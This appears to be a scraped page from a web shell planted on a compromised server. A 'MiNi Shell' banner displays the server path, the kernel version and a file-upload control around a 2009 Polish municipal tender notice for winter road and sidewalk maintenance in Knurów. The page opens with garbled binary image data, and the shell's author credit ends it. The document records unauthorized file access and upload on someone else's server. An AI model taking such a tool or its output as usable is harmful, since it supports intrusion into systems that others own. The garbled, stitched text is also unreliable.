JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/146253-N-2009.html

<p class="kh_header"><b>Knurów: Zimowe utrzymanie dróg, chodników, ciągów pieszych i parkingów gminnych w sezonie 2009/2010</b><br>
<b>Numer ogłoszenia: 146253 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Knurów , ul. dr. Floriana Ogana 5, 44-190 Knurów, woj. śląskie, tel. 032 3392308, faks 032 2351521.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.knurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg, chodników, ciągów pieszych i parkingów gminnych w sezonie 2009/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia polega na świadczeniu usług związanych z zimowym utrzymaniem dróg, chodników, ciągów pieszych i parkingów gminnych w sezonie 2009/2010
1.1.Zakres rzeczowy obejmuje:
a)ulice I kolejności zimowego utrzymania - 2,6 km + (0,77 km od 01.01.2010r.) zgodnie z wykazem wg załącznika nr 1 do wzoru umowy,
b)ulice II kolejności zimowego utrzymania - 41,74 km zgodnie z wykazem wg załącznika nr 2 do wzoru umowy, 
c)ulice III kolejności zimowego utrzymania - 5,43 km zgodnie z wykazem wg załącznika nr 3 do wzoru umowy,
d)chodniki do odśnieżania i posypywania - 53.920 m2  oraz parkingi i przejścia pod wiaduktami do odśnieżania i posypywania - 12.520 m2 zgodnie z wykazem wg załącznika nr 4 do wzoru umowy,
e)pozimowe oczyszczenie ulic - 36,96 km zgodnie z wykazem wg załącznika nr 5 do wzoru umowy,
f)pozimowe oczyszczenie chodników - 53.920 m2 oraz parkingów i przejść pod wiaduktami -  12.520 m2 zgodnie z wykazem wg załącznika nr 4 do wzoru umowy,
1.2.Zakres prac obejmuje:
a)odśnieżanie i zwalczanie śliskości nawierzchni dróg, chodników, ciągów pieszych i parkingów gminnych mieszanką piasku i soli według kolejności zimowego utrzymania ustalonych prze zamawiającego wg wykazów - załączniki nr 1, 2, 3, 4 do wzoru umowy:
ulice I kolejności zimowego utrzymania (załącznik nr 1) - wykonawca zapewnia odśnieżenie i posypanie jezdni mieszanką piasku i soli na całej jej długości. Po opadach nocnych wykonawca zapewnia wykonanie prac do godz. 6.00 rano. W przypadku opadów ciągłych - systematycznie odśnieża i posypuje, dopuszcza się zakończenie prac w ciągu 1 godziny po ustaniu zjawisk atmosferycznych,
ulice II kolejności zimowego utrzymania (załącznik nr 2) - wykonawca zapewnia odśnieżenie i posypanie jezdni mieszanką piasku i soli na całej jej długości. Po opadach nocnych wykonawca zapewnia wykonanie prac do godz. 8.00 rano. W przypadku opadów ciągłych - dopuszcza się zakończenie prac w ciągu 6 godzin po ustaniu zjawisk atmosferycznych (opadów i gołoledzi),
ulice III kolejności zimowego utrzymania (załącznik nr 3) - odśnieżanie i posypywanie jezdni mieszanką piasku i soli wykonywane będzie doraźnie jedynie po intensywnych opadach śniegu lub zaistnieniu innych niekorzystnych warunków atmosferycznych (zawieje, zamiecie, gołoledź). Dopuszcza się, iż prace te zostaną wykonane przez wykonawcę w ciągu 6 godzin od momentu zgłoszenia,
systematyczne odśnieżanie i posypywanie mieszanką piasku i soli chodników, ciągów i parkingów na terenie miasta, na całej powierzchni wg wykazu - załącznik nr 4. Po opadach nocnych wykonawca zapewnia wykonanie prac do godz. 8.00 rano. W przypadkach opadów ciągłych - dopuszcza się zakończenie prac w ciągu 6 godzin po ustaniu zjawisk atmosferycznych (opadów i gołoledzi).
b)pozimowe oczyszczenie ulic wg wykazu - załącznik nr 5 do wzoru umowy - wykonawca zapewni oczy6szczenie ulic na całej długości i szerokości, ze szczególną dbałością o pas przykrawężnikowy w terminie do dnia 10.04.2010r,
c)pozimowe oczyszczenie chodników i parkingów wg wykazu - załącznik nr 4 do wzoru umowy - wykonawca zapewni oczyszczenie z wszystkich nieczystości całej powierzchni chodników i parkingów łącznie z oczyszczeniem krawężników i obrzeży w terminie do dnia 10.04.2010r.
2.Przedmiot zamówienia wykonawca będzie realizował przy użyciu sprzętu wskazanego w ofercie. Każdy pojazd winien być wyposażony w telefon komórkowy w celu utrzymania stałej łączności.
3.Wykonawca we własnym zakresie zabezpieczy odpowiednią ilość piasku i soli, która wystarczy na prowadzenie akcji zima w ciągu całego sezonu zimowego. Wykonawca uzupełniał będzie ewentualne niedobory piasku i soli na bieżąco, odpowiednio wcześniej i na własny koszt.
4.W przypadku obfitych opadów śniegu, w ramach prowadzonych prac, śnieg zgromadzony na poboczach i w obrębie przejść, stanowiący utrudnienia w ruchu w miejscach wskazanych przez zamawiającego, będzie pryzmowany i wywożony przez wykonawcę nieodpłatnie, na życzenie zamawiającego, w ciągu 24 godzin od momentu zgłoszenia.
5.Zamawiający zastrzega sobie możliwość udzielenia zamówień uzupełniających realizatorowi zamówienia, stanowiących nie więcej niż 20% wartości zamówienia podstawowego zgodnie z art. 67 ust. 1 pkt. 6 pzp.
6.Zamówienie, o którym mowa powyżej może zostać udzielone nie później niż w okresie 3 lat od udzielenia zamówienia podstawowego.
7.Zamawiający dopuszcza zmianę postanowień umowy zawartej w wyniku niniejszego postępowania w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w  przypadkach wskazanych w wzorze umowy stanowiącym załącznik do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.10.00-3, 90.61.20.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Wykonawca winien spełniać warunki zawarte w art. 22 ust. 1 pkt 1-3 pzp,
2.Wykonawca nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 ust. 1 i 2 pzp. 
3.Wykonawca winien być uprawniony do występowania w obrocie prawnym.
4.Wykonawca winien wykazać się w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy - w tym okresie, wykonaniem lub wykonywaniem co najmniej 1 (jednego) zamówienia obejmującego usługi odpowiadające swoim rodzajem usługom objętym przedmiotem zamówienia. Przez usługi odpowiadające swoim rodzajem usługom objętym przedmiotem zamówienia należy rozumieć świadczenie usług zimowego utrzymania dróg i chodników obejmujące co najmniej:
4.1.40 km dróg, 
4.2.14 km chodników i ciągów pieszych
4.3.9.000 m2 parkingów. 
5.Wykonawca winien dysponować specjalistycznym sprzętem (urządzeniami) przeznaczonym do realizacji przedmiotowego zamówienia, gwarantującym wykonanie usług w terminie i założonym zakresie, w tym:
5.1.sprzętem przeznaczonym wyłącznie do realizacji przedmiotowego zamówienia w ilości minimum:
a)nośniki z pługiem i piaskarką (pługopiaskarki) - 4 szt.,
b)ładowarka - 1 szt., 
c)spycharka - 1 szt.,
d)zamiatarka do pozimowego oczyszczenia ulic - 1 szt.,
e)mikrociągnik lub multikar (ewentualnie inny specjalistyczny sprzęt do chodników) z osprzętem do odśnieżania i posypywania - 2 szt. 
lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia ww potencjału technicznego.
5.2.wyposażeniem każdego z pojazdów w telefon komórkowy w celu utrzymania stałej łączności,
6.Wykonawca winien dysponować bazą firmy z placem składowym zlokalizowaną na terenie miasta Knurów lub w odległości do 10 km od granicy miasta.
7.Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 200.000,00 zł.
8.Wykonawca winien znać warunki techniczne, topograficzne i lokalizacyjne prowadzenia prac będących przedmiotem zamówienia.
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach wyszczególnionych poniżej. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia spełniania warunków udziału w postępowaniu określonych powyżej wykonawca winien załączyć do oferty:
1.1.oświadczenie, że spełnia warunki określone w art. 22 ust. 1 pkt 1-3 pzp,
1.2.oświadczenie, że nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 ust. 1 i 2 pzp.
1.3.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.4.wykaz wykonanych lub wykonywanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy - w tym okresie, zamówień obejmujących usługi odpowiadające swoim rodzajem usługom objętym przedmiotem zamówienia. Wykaz winien zawierać nazwę zmawiającego, przedmiot zamówienia, datę wykonania i wartość prac. Do wykazu należy załączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie.
1.5.dokumenty potwierdzające dysponowanie przez wykonawcę niezbędnymi do wykonania zamówienia narzędziami i urządzeniami, tj.: 
a)wykaz sprzętu przeznaczonego wyłącznie do realizacji przedmiotowego zamówienia oraz pisemne zobowiązanie innego podmiotu do jego udostępnienia, jeżeli w wykazie, wykonawca wskazał potencjał techniczny, którym będzie dysponował do realizacji przedmiotowego zamówienia,
b)oświadczenie wykonawcy, że każdy z pojazdów wyposażony zostanie w telefon komórkowy w celu utrzymania stałej całodobowej łączności telefonicznej z zamawiającym oraz pomiędzy poszczególnymi jednostkami odśnieżającymi,
c)oświadczenie wykonawcy, że dysponuje lub w dniu podpisania umowy będzie dysponował bazą firmy z placem składowym zlokalizowaną na terenie miasta Knurów lub w odległości do 10 km od granicy miasta,
1.6.polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
1.7.oświadczenie wykonawcy, że zna warunki techniczne, topograficzne i lokalizacyjne prowadzenia prac będących przedmiotem zamówienia.
2.Dokumenty wymienione wyżej mogą być przedstawione w formie oryginałów albo kopii po­świadczonych za zgodność z oryginałem przez wykonawcę. Kserokopie dokumentów winny posiadać klauzulę Za zgodność z oryginałem.
3.W przypadku poświadczenia za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) wykonawcy należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii. 
4.Wykonawcy, którzy wspólnie ubiegać się będą o udzielenie zamówienia powinni:
4.1.każdy z wykonawców oddzielnie musi udokumentować, że nie podlega wykluczeniu z postępowania ,
4.2.wykonawcy łącznie muszą posiadać potencjał techniczny, ekonomiczny i finansowy oraz wiedzę niezbędną do realizacji zamówienia zgodnie z wymaganiami zamawiającego.
5.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokumenty zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz. U Nr 87 poz. 605, z późn. zm.). Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę z zastrzeżeniem art. 9 ust. 3 pzp. 
6.W celu sprawdzenia czy wykonawca spełnia warunki udziału w postępowaniu w przypadku, gdy kwoty podane w dokumentach będą w walucie obcej, zamawiający dokona ich przeliczenia na złotówki biorąc za podstawę średni kurs NBP waluty z dnia otwarcia ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.knurow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy w siedzibie zamawiającego - Wydział Zamówień Publicznych, pok. 218, w godz. 8:00 - 13:30 lub za zalicz. pocztowym po uiszczeniu opłaty - 9,25 zł na konto zamawiającego.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2009 godzina 10:00, miejsce: Urząd Miasta Knurów, ul. dr. F. Ogana 5, 44-190 Knurów, Wydział Zamówień Publicznych, pok. 218, II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Przy wyborze oferty zamawiający będzie kierował się następującymi kryteriami:
1.1.cena za odśnieżanie i posypywanie 1 km dróg I, II lub III kolejności za dobę - 70 %,
1.2.cena za odśnieżanie i posypywanie chodników, ciągów, przejść pod wiaduktami lub parkingów miejskich za 100 m2 za dobę - 20 %,
1.3.cena za pozimowe oczyszczenie dróg, chodników, parkingów i przejść pod wiaduktami za cały zakres wymieniony w zał. nr 4 i 5 do wzoru umowy, za jeden sezon - 10 %
2. Osobami uprawnionymi do porozumiewania się z wykonawcami są: 
Naczelnik Wydziału Zamówień Publicznych - Grażyna Szweda, tel. (032) 339-23-08,

Creat By MiNi SheLL
Email: jattceo@gmail.com